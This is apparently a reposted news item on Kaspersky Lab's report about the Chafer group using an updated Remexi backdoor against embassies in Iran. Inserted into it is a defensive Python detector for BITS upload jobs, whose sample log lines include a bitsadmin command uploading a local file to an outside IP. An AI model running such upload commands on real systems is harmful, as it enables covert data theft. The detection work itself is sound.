
Chafer cyberespionage group targets embassies with updated homebrew spyware

by onlinecitizen
01/02/2019
in Tech

Kaspersky Lab researchers have detected multiple attempts to infect foreign diplomatic entities in Iran with homebrew spyware. The attacks appear to be using an updated Remexi backdoor. Several legitimate tools were also used during the campaign. The Remexi backdoor is linked to a suspected Farsi-speaking cyberespionage group known as Chafer, previously associated with the cyber-surveillance of individuals in the Middle East. The targeting of embassies could suggest a new focus for the group.

The operation highlights how threat actors in emerging regions are mounting campaigns against targets of interest using relatively basic, homebrew malware combined with publicly available tools. In this instance, the attackers used an improved version of the Remexi backdoor – a tool that enables remote administration of a victim’s machine.

Remexi was first detected in 2015, being used by a cyberespionage group named Chafer for a cyber-surveillance operation targeting individuals and a number of organizations across the Middle East. The fact that the backdoor used in the new campaign has code similarities with known Remexi samples, combined with the target victim set, means that Kaspersky Lab’s researchers have linked it to Chafer with medium confidence.

The newly discovered Remexi malware is able to execute commands remotely and to seize screenshots, browser data including user credentials, login data and history, and any typed text, among other things.

The stolen data is exfiltrated using the legitimate Microsoft Background Intelligent Transfer Service (BITS) application – a Windows component designed to enable background Windows updates.
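Because BITS is a legitimate Windows component, outbound BITS jobs are easy to overlook. The following is an added example, not taken from this article or from Kaspersky Lab's report, of flagging BITS upload jobs in process-creation logs. It assumes the jobs are started through the `bitsadmin.exe` command-line tool; the function name, the allowlist parameter and the sample log lines are hypothetical.

```python
import re
import shlex
from urllib.parse import urlsplit

# bitsadmin job types that send data out of the host.
UPLOAD_SWITCHES = {"/upload", "/upload-reply"}

# Constructed sample: process-creation command lines, e.g. from
# Security event 4688 or Sysmon event 1. Hosts and paths are made up.
SAMPLE_CMDLINES = [
    r'bitsadmin.exe /transfer wu_sync /download /priority normal '
    r'https://updates.example.com/a.cab C:\Temp\a.cab',
    r'"C:\Windows\System32\bitsadmin.exe" /TRANSFER job1 /UPLOAD '
    r'/priority HIGH http://203.0.113.10/up/data.bin C:\Users\Public\cache.dat',
    r'bitsadmin /create /upload job2',
    r'notepad.exe C:\notes\bitsadmin-upload.txt',
]


def find_bits_uploads(cmdlines, allowed_hosts=frozenset()):
    """Return bitsadmin upload invocations whose remote host is not allowlisted."""
    findings = []
    for line in cmdlines:
        try:
            # posix=False keeps Windows backslashes intact.
            tokens = shlex.split(line, posix=False)
        except ValueError:  # unbalanced quotes in a logged command line
            tokens = line.split()
        if not tokens:
            continue
        # Match on the executable name only, not on arguments that mention it.
        image = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
        if image not in ("bitsadmin", "bitsadmin.exe"):
            continue
        switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
        if not switches & UPLOAD_SWITCHES:
            continue
        url = next((t.strip('"') for t in tokens[1:]
                    if t.lower().startswith(("http://", "https://"))), None)
        host = urlsplit(url).hostname if url else None
        if host in allowed_hosts:
            continue
        # host is None when the job is created first and the URL is added later.
        findings.append({"cmdline": line, "remote_host": host})
    return findings
```

BITS jobs created through the COM API or PowerShell do not appear as `bitsadmin.exe` command lines; for those, review the Microsoft-Windows-Bits-Client/Operational event log as well.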

The trend towards combining malware with appropriated or legitimate code helps attackers both to save time and resources when creating malware and to make attribution more complicated.

“When we talk about likely state-sponsored cyberespionage campaigns, people often imagine advanced operations with complex tools developed by experts. However, the people behind this spyware campaign look more like system administrators than sophisticated threat actors,” said Denis Legezo, security researcher at Kaspersky Lab.

“They know how to code, but their campaign relies more on the creative use of tools that exist already, than on new, advanced features or elaborate architecture of the code. However, even relatively simple tools can cause significant damage so we urge organizations to protect their valuable information and systems against all levels of threats, and to use threat intelligence to understand how the landscape is evolving,” he added.

To protect yourself from targeted spyware:

  • Use a proven, corporate-grade security solution with anti-targeted attack capabilities and threat intelligence, such as the Kaspersky Threat Management and Defense solution. It is capable of spotting and catching advanced targeted attacks by analyzing network anomalies and giving cybersecurity teams full visibility over the network and response automation.
  • Introduce security awareness initiatives enabling employees to master the skill of identifying suspicious messages. Email is a common entry point for a targeted attack, and Kaspersky Lab customers would benefit from Kaspersky Security Awareness Training.
  • Provide your security team with access to up-to-date threat intelligence data, to keep pace with the latest tactics and tools used by cybercriminals, and enhance security controls already in use.

Read the full version of the report on Securelist.com.
